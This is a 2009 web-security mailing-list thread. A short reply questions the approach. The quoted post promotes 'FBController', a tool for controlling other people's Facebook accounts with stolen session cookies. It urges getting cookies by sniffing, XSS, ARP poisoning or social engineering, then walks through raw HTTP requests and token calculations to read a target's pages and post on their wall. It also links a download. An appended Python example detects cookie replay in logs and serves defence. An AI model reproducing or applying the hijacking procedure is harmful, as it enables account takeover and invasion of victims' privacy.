[WEB SECURITY] FBController - (Facebook Control Utility) version 1.0

Chris Eng ceng at Veracode.com
Thu Apr 30 16:59:47 EDT 2009


Apologies if I'm overlooking something here, but if you have the victim's Facebook cookie, why wouldn’t you simply use an HTTP proxy or Firefox plugin to inject the stolen cookie into a request for /home.php, and then let the web browser do the rest of the work calculating/updating all the tokens?
> -----Original Message-----
> From: QUAKER DOOMER [mailto:quakerdoomer at inbox.lv]
> Sent: Thursday, April 30, 2009 4:32 PM
> To: websecurity at webappsec.org
> Subject: [WEB SECURITY] FBController - (Facebook Control Utility) version 1.0
> 
> FBController - The Ultimate Utility to Control Facebook accounts without the Password.
> 
> Let me be clear that this utility WON'T hack/crack Facebook accounts.
> The utility will need biscuits/cookies instead of the password.
> 
> Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, scroogle search, anyhow !
> Once you have the cookies you can use FBController and have Full control over the target's Facebook account.
> 
> ==============================================================
> Login to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.
> 
> 1 ] Generate an OG 10 Digit Unix Timestamp. If possible not way back older than FaceBook.COM's current SYSTIME.
> 
> 
> 2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)
> [code]
> GET /home.php? HTTP/1.1
> Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIT-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
> [/code]
> 
> 
> 3 ] From the Response Obtained :
> Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].
> 
> Calculating the new nctr[ct] :
> Add +79 to Original Timestamp. Append 3 more digits to its end.
> 
> Calculating &oldest= :
> Deduct 144556 from Original Timestamp.
> 
> Calculating composer_id :
> Search for
> UIComposer_STATE_PIC_OUTSIDE\" id=\"
> This will be your composer_id at the later stage in the Status Update Page / Other Post Request
> 
> Calculating post_form_id :
> Search for
> post_form_id:"
> This will be your post_form_id at the later stage in the Status Update Page / Other Post Request
> 
> Calculating fb_dtsg :
> Right after post_form_id (explained just above this section) you can locate fb_dtsg.
> Else Search for
> ,fb_dtsg:"
> This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request
> 
> Your login_x actually looks like
> a:2:{s:5:"email";s:13:"you at youremailprovider.com";s:19:"remember_me_default";b:0;}
> But keep it unchanged in the hex format.
> 
> 
> 4 ] Send a GET Request like below with the above calculated variables :
> [code]
> GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
> Accept: */*
> Accept-Language: en-US
> XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> x-svn-rev: 161013
> UA-CPU: x86
> XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
> Host: www.facebook.com
> Connection: Keep-Alive
> Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIT-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php
> [/code]
> 
> 5 ] In the output :
> Search for Env[\"nctrlid\"]=\"
> This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)
> 
> 
> 6 ] Generate a new POST Request with the above calculated new variables :
> [code]
> POST /updatestatus.php HTTP/1.1
> Accept: */*
> Accept-Language: en-US
> XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> x-svn-rev: 161013
> Content-Type: application/x-www-form-urlencoded
> UA-CPU: x86
> XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
> Host: www.facebook.com
> Content-Length: 343
> Connection: Keep-Alive
> Cache-Control: no-cache
> Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIT-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php
> 
> action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-IN-POINT-3)375
> [/code]
> 
> 
> 7 ] Use the above variables to view any content with the appropriate GET / requests
> 
> 
> 8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)
> 
> 
> Looks like loads of HardWork ha ?
> If you don't want to do all this manually, then you can download this TooL named FBController (FACEBOOK CONTROLLER) written by me.
> Till now FBController version 1.0 uses your Target's provided cookie and only :
> 
> A > Downloads the HomePage.
> B > Allows you to Update the Target's Wall and
> C > Retrieve your Target's Friend's List
> 
> There are many APIs available to write apps and 3rd party Tools for FB in Java, Perl, .NET, etc.
> 
> FBConTroller was entirely written without knowing any of Facebook's Dev API's.
> Considering the above along with Facebook's complexity, the next version might take some time to get released.
> 
> Many more features to come in version 2.0
> 
> A 26th April Release !
> Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 2009.
> 
> Happy Controlling ! :-)
> ==============================================================
> 
> Download : http://my.opera.com/quakerdoomer/blog/2009/04/30/fbcontroller-facebook-controller-the-ultimate-facebook-controller-without-the-pa
> 
> The Latest available release is FBCONTROLLER version 1.0
> Coded by : Azim Poonawala (QUAKERDOOMER)
> Author's website : http://solidmecca.co.nr
> 
> Regards,
> QUAKERDOOMER
> 
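The cookie replay walked through above leaves a trace on the server side: the same session (the fixed c_user plus the rotating xs cookie) suddenly arriving from a different client. As an added example, not part of the original post or of the FBController tool, the Python below runs that check over a few constructed access-log lines whose format (source IP, request line, Cookie header, User-Agent) is assumed for this illustration.

```python
import re

# Constructed sample access-log lines (source IP, request line, Cookie header,
# User-Agent); the format is assumed for this example and is not a real Facebook log.
SAMPLE_LOG = """\
203.0.113.10 "GET /home.php HTTP/1.1" "c_user=1000000001; xs=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.0"
203.0.113.10 "GET /ajax/intent.php HTTP/1.1" "c_user=1000000001; xs=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.0"
198.51.100.77 "POST /updatestatus.php HTTP/1.1" "c_user=1000000001; xs=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
203.0.113.10 "GET /home.php HTTP/1.1" "c_user=1000000002; xs=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.0"
"""

LINE_RE = re.compile(r'^(\S+) "([^"]*)" "([^"]*)" "([^"]*)"$')
# Only the two cookies that identify the session matter here: c_user (the fixed
# account id) and xs (the rotating session secret).
COOKIE_RE = re.compile(r'(?:^|;\s*)(c_user|xs)=([^;]+)')


def parse_line(line):
    """Return the fields of one log line, or None if it carries no session cookie."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, request, cookie, ua = m.groups()
    fields = dict(COOKIE_RE.findall(cookie))
    if "c_user" not in fields or "xs" not in fields:
        return None
    return {"ip": ip, "request": request, "ua": ua,
            "c_user": fields["c_user"], "xs": fields["xs"]}


def find_session_reuse(log_text):
    """Flag every request whose (c_user, xs) pair was first seen from a different
    source IP or User-Agent: the signature of a replayed session cookie."""
    first_seen = {}
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["c_user"], rec["xs"])
        origin = first_seen.setdefault(key, (rec["ip"], rec["ua"]))
        if (rec["ip"], rec["ua"]) != origin:
            alerts.append({"c_user": rec["c_user"], "request": rec["request"],
                           "origin_ip": origin[0], "new_ip": rec["ip"],
                           "origin_ua": origin[1], "new_ua": rec["ua"]})
    return alerts


if __name__ == "__main__":
    for a in find_session_reuse(SAMPLE_LOG):
        print(f"session of c_user={a['c_user']} replayed from {a['new_ip']} "
              f"({a['new_ua']}) for {a['request']}; first seen from {a['origin_ip']}")
```

A roaming client or a NAT can change the source IP legitimately, so in production this signal is one input to a risk score rather than a hard block.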